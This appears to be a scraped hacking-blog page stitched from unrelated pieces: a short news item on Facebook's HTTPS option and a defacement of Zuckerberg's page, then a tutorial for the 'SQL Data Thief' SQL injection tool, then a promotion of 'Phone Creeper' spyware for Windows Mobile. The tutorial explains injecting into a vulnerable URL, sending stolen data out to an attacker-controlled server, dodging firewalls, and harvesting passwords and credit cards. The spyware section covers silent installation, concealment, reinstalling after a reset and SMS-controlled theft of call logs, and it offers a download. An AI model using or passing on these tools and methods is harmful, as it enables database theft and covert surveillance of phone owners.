The first new security measure involves expanding the use of HTTPS -- Hypertext Transfer Protocol Secure -- beyond password exchanges.

Rice writes: "Starting today we'll provide you with the ability to experience Facebook entirely over HTTPS. You should consider enabling this option if you frequently use Facebook from public Internet access points found at coffee shops, airports, libraries or schools. The option will exist as part of our advanced security features, which you can find in the 'Account Security' section of the Account Settings page."

The second measure is a captcha-like authentication mechanism that instead of relying on illegible printed words employs photographs of a Facebook user's own friends.
Rice continues: "Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication. We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don't know who your friends are."
Meanwhile, Facebook has remained officially mum regarding yesterday's apparent hacking incident that saw someone insert a message onto Zuckerberg's Facebook fan page, which has attracted 2.8 million Facebook users. While it was removed relatively quickly, some 1,800 of those users managed to "like" the page and more than 400 left comments beforehand. The message read:
"Let the hacking begin: If facebook needs money, instead of going to the banks, why doesn't Facebook let its users invest in Facebook in a social way? Why not transform Facebook into a 'social business' the way Nobel Price [sic] winner Muhammad Yunus described it? #hackercup2011"

As of this writing, Zuckerberg's page remains disabled.

SQL Data Thief

Here Its “SQL Data Thief” uses techniques Manipulating MS SQL Server using SQL injection, to retrieve information from databases of web applications vulnerable to SQL injection which use SQL Server as a backend database server and doesn’t filter well outbound connections.

Data Thief will extract tha data from tha databases of tha vulnerable web application & also it will display tha data after sending tha data to a SQL Server that you control..Here We Go..

Before using this tool you Guys Find tha Vulnerability in tha web application Or Any Site, And that is Tha Gate entry point to exploit SQL injection,hmmm hum,
Then,Try Using Havij SQL INJECTION TOOL,tat we Discussed Last Week Topic, ACUNETIX is also  Good To Scan Vulnerability..!!

Lemme Assume That U r Visiting something random Today..:)

“http://hackersbay.in/test.asp?search=random” And is vulnerable, than try to find an entry point in tha query string of tha vulnerable url to insert SQL like http://hackersbay.in/test.asp?search=random"’; select 1-- , after that you can start using Data Thief
.
After finding an entry point to exploit SQL injection in tha web application, tha only thing you have to do is to replace in tha SQL injection entry point in tha url query string or in tha Post Data if tha data is submited by HTTP POST method with <***>.
ie: http://hackersbay.in/test.asp?search=random’; <***>

1)
SQL Server : server name of a SQL Server that you control.
Login: login of a SQL Server that you control.
Pwd: login password of a SQL Server that you control.
Port: listening port of a SQL Server that you control.
Max. Rows: maximum number of rows returned in queries from tha victim.

2)
Url: complete url vulnerable to SQL injection.
Method: HTTP method used to submit tha data.
Post Data: data to be send when selected POST method.
Go: submit tha data and retrieve initial SQL Server information (linked servers, databases, version, user, etc.).

After clicking tha Go button tha main window will display :

1)
Linked Servers: displays tha linked servers in tha victim SQL Server.
Databases: displays tha databases in tha victim SQL Server.
2)
Results: displays version, login name, user name, etc. of tha victim SQL Server.

Once databases are displayed In tha Tool you can chose a database and click List Tables button to display tha database tables,And Guys you can set to tha option List system tables to display or not Show tha Fuckin sytem tables.

After displaying tha tables you can chose a table and click List Fields button to display tha table fields.
Than you can select tha fields to build a query that will be submited when clicking Run Query button, tha query will return as much rows you set in tha Max. Rows option.

1)
Tables: displays tha tables in tha selected database after clicking List Tables button.
Fields: displays tha fields in tha selected table after clicking List Fields buton. Tha fields names must b selected to build a query.

2)
Query: displays tha query build with tha selected fields.
Run Query: submits tha query.

3)
Results: displays tha result of tha query after clicking Run Query button. You can cut and paste tha results to import tham in MS Access, SQL Server, etc.

Data Thief also displays in a window tha HTML source code of every response of tha vulnerable Web application after submitions. You can look at tha HTML source code for error messages if Data Thief doesn’t work.

Tips:

-Look in tha HTML window for web application error messages when Data Thief doesn’t work, ie: if firewall is blocking outbound connections you will get : [DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist or access denied. error message or a similar one.
-Change SQL Server port number to common outbound open ports at firewalls: 80, 53, 25, etc. if you think 1433 could be blocked.
-Decrease Max. Rows value if you or tha victim server have an slow connection.
-Edit Data Thief source code to fit your needs (or let me know so i can add tham)

Niggas You Kno Wat, Most Hackers Use tis retrieve tha Information, Like Emails ids, Passes, Credit Carders, And More Sensitive Information, And Posting it For Public Bulletin Boards, So If Some1 Posting Stuffs In Boards of Forums, Doesn’t Mean They Hacked Or Root Level Access Escalation, May Be Found Tha Vulnerabilty And they WILL Fetch tha Sensite Information From tha Security LoopHole In the Particular Website..!

TODO

  1. -Encode urls, post data to avoid detection.
  2. -Display more information.
  3. -Add to execute exploits to elevate privileges in tha victim SQL Server depending on version.
  4. -Execute OS commands on tha victim server and displays results.
  5. -Option to save query results.
  6. -Many things.

Offcial Website : http://datathief.org/ there is no more Information Or Tutorials u cant find there But only tha Tool..!!

Phone Creeper: A Windows Phone Espionage Suite

For some time now, there were spy apps for Symbian phones and BlackBerry’s too! Surprisingly, there none for the Windows Mobile operating system. More so, because applications like these are sold for a fee. Phone Creeper will change it all!

Phone Creeper is a phone espionage suite that is being actively developed for sometime now. It can be silently installed by just inserting an SD card with the files included in the package. As is the requirement of all spy tools, the program does not show up under installed programs or running programs and allows for a useful array or features. Best of all, phones running this software can be remotely controlled by text messages! This could ensure a longer battery life as it does not need bluetooth or infrared connection. Plus, with BT and IR, you need to be in a fixed radius to get best results. Yes, this does add to the text messaging costs and if the user were to grow suspicious with rising bills, chances are that this tool could be removed from the phone. But, worry not! By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device. If only the memory card is not formatted, this feature will help us a lot!

All commands will be silently received and deleted immediately and results will be issued back to sender. Pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. It does all the normal spy stuff – get phone records, get GPS info etc.

These are the commands that you can possibly use to err spy on some one:

The mother of all commands:
1
password FTPgetcalllogs - To receive any log by FTP, you can pre-seed any get com
By default, the password is set to the creators name – chetstriker. So, you will have to reset it to something of your choice before actively using it.
If only there was a command to stop the text messaging counter to be fixed to a certain number! :P I have never used a Windows Mobile and so this was a first for me when I got to know that the WM phone has FTP too!
If you infect yourself by accident, the author has been gracious enough to provide a Phone Creeper uninstaller too!
 Download Phone Creeper v0.98 (PhoneCreeper_V0.98.cab) and it’s uninstaller (RemoveCreeper.zip) here.
